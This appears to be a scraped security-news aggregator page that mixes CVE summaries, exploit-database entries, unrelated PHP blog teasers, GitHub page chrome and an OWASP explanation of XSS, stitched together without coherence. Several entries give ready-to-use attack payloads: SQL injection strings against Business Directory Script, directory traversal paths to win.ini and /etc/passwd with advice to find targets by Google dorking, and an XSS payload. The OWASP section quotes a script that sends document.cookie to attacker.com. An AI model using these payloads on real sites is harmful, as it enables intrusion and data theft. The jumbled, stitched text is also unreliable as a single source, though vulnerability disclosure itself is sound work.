A vulnerability was found in Beijing Baichuo Smart S85F Management Platform up to 20230809. It has been rated as problematic. This issue affects some unknown processing of the file /config/php.ini. The manipulation leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-238049 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4544

A vulnerability was found in D-Link DAR-8000-10 up to 20230809. It has been classified as critical. This affects an unknown part of the file /app/sys1.php. The manipulation of the argument cmd with the input id leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-238047. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4542

A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add Expense parameter under the Expense section.

**PHP Class Not Found Error \[Solved\]**

This article aims to aid your comprehension of the occurrence of a **Fatal Error** in PHP, specifically the error message **"PHP Fatal error: Uncaught Error: Class '...' not found"**. Within this article, we will dig into the investigation of this error's origins. To illustrate this error's occurrence, we will create a simple code snippet simulating a scenario. Furthermore, I will provide you with code snippets to address the error.

*   Read more about PHP Class Not Found Error \[Solved\]
*   9 views

**Will ChatGPT Replace Programmers?**

In recent years, the field of artificial intelligence has been advancing at an astonishing pace, leading to transformative changes in various industries. Among these advancements, ChatGPT, a conversational AI model developed by OpenAI, has garnered significant attention for its remarkable ability to engage in natural language conversations. While some concerns have arisen about the potential

*   Read more about Will ChatGPT Replace Programmers?
*   56 views

CVE-2023-39707: Free Source Code Projects and Tutorials

Business Directory Script version 3.2 suffers from a remote SQL injection vulnerability.

    ## Title: Business-Directory-Script-3.2 SQLi## Author: nu11secur1ty## Date: 08/25/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The `column` parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the column parameter, and adatabase error message was returned. You should review the contents ofthe error message, and the application's handling of other input, toconfirm whether a vulnerability is present. Additionally, the payload(select*from(select(sleep(20)))a) was submitted in the columnparameter. The application took 20271 milliseconds to respond to therequest, compared with 230 milliseconds for the original request,indicating that the injected SQL command caused a time delay. Theattacker can steal all information from the database of the server ofthis application!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: column (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)## Time spend:01:35:00

Business Directory Script 3.2 SQL Injection

Groupoffice version 3.4.21 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Groupoffice v3.4.21 Directory Traversal Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.group-office.com                                                                                         || # Dork      : Powered by Group-Office                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /compress.php?file=../../../../../../../../../../windows/win.ini[+] http://127.0.0.1/aa-hwkorg/compress.php?file=../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Groupoffice 3.4.21 Directory Traversal

Grawlix CMS version 1.1.1 suffers from a cross site scripting vulnerability.

    ============================================================================================================================| # Title     : Grawlix Cms v1.1.1 xss Vulnerability                                                                       || # Author    : indoushka                                                                                                  || # Tested on : windows 10 Français V.(Pro)                                                                                || # Vendor    : http://getgrawlix.com/                                                                                     |  | # Dork      : Powered by The Grawlix CMS                                                                                 |============================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/obarandacom/_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] php info : http://127.0.0.1/obarandacom/info.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Grawlix CMS 1.1.1 Cross Site Scripting

Gravigra CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Gravigra CMS v1.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.alwafaagroup.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news.php?nid=1 ( inject her )[+] use payload : http://127.0.0.1/gravigracom/news.php?nid=1 ( inject her )Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gravigra CMS 1.0 SQL Injection

The FV Flowplayer Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_fv_player_user_video’ parameter saved via the 'save' function hooked via init, and the plugin is also vulnerable to Arbitrary Usermeta Update via the 'save' function in versions up to, and including, 7.5.37.7212 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, and makes it possible to update the user metas arbitrarily, but the meta value can only be a string.

CVE-2023-4520: Changeset 2957322 for fv-wordpress-flowplayer – WordPress Plugin Repository

Silverware Games is a premium social network where people can play games online. When using the Recovery form, a noticeably different amount of time passes depending of whether the specified email address presents in our database or not. This has been fixed in version 1.3.7.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Customer Stories
    *   White papers, Ebooks, Webinars
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

mesosoi / **silverwaregames-io-issue-tracker** Public

*   Notifications
*   Fork 0
*   Star 3
    

*   Code
*   Issues 67
*   Pull requests
*   Discussions
*   Actions
*   Projects
*   Security
*   Insights

More

Low

mesosoi published GHSA-9684-6j5x-ccx9

Aug 22, 2023

**Package**

recovery.php (SilverwareGames.io)

**Affected versions**

< 1.3.7

**Patched versions**

1.3.7

**Description**

When using the Recovery form, a noticeably different amount of time passes depending of whether the specified email address presents in our database or not. This has been fixed in version 1.3.7.

See also: CVE-2023-40179

**Severity**

Low

3.7

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

High

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

Low

Integrity

None

Availability

None

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

**CVE ID**

CVE-2023-40182

**Weaknesses**

CWE-208

CVE-2023-40182: The server responds in a noticeably different amount of time depending if a given email address exists or not

IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.

OWASP Top Ten 2017

Threat Agents / Attack Vectors

Security Weakness

Impacts

App. Specific

Exploitability: 3

Prevalence: 3

Detectability: 3

Technical: 2

Business ?

Automated tools can detect and exploit all three forms of XSS, and there are freely available exploitation frameworks.

XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications.  
Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.

The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim’s browser, such as stealing credentials, sessions, or delivering malware to the victim.

Is the Application Vulnerable?

There are three forms of XSS, usually targeting users’ browsers:  
\* **Reflected XSS**: The application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.  
\* **Stored XSS**: The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.  
\* **DOM XSS**: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.  
Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user’s browser such as malicious software downloads, key logging, and other client-side attacks.

How to Prevent

Preventing XSS requires separation of untrusted data from active browser content. This can be achieved by:  
\* Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework’s XSS protection and appropriately handle the use cases which are not covered.  
\* Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet ‘XSS Prevention’ has details on the required data escaping techniques.  
\* Applying context-sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the OWASP Cheat Sheet ‘DOM based XSS Prevention’.  
\* Enabling a Content Security Policy (CSP) as a defense-in-depth mitigating control against XSS. It is effective if no other vulnerabilities exist that would allow placing malicious code via local file includes (e.g. path traversal overwrites or vulnerable libraries from permitted content delivery networks).  

Example Attack Scenarios

**Scenario #1**: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:  
**(String) page += "<input name='creditcard' type='TEXT'  
****value='" + request.getParameter("CC") + "'>";  
**The attacker modifies the ‘CC’ parameter in the browser to:  
**'><script>document.location=  
****'http://www.attacker.com/cgi-bin/cookie.cgi?  
****foo='+document.cookie</script>'.  
**This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.  
**Note**: Attackers can use XSS to defeat any automated Cross-Site Request Forgery (CSRF) defense the application might employ.

References

Tag

#php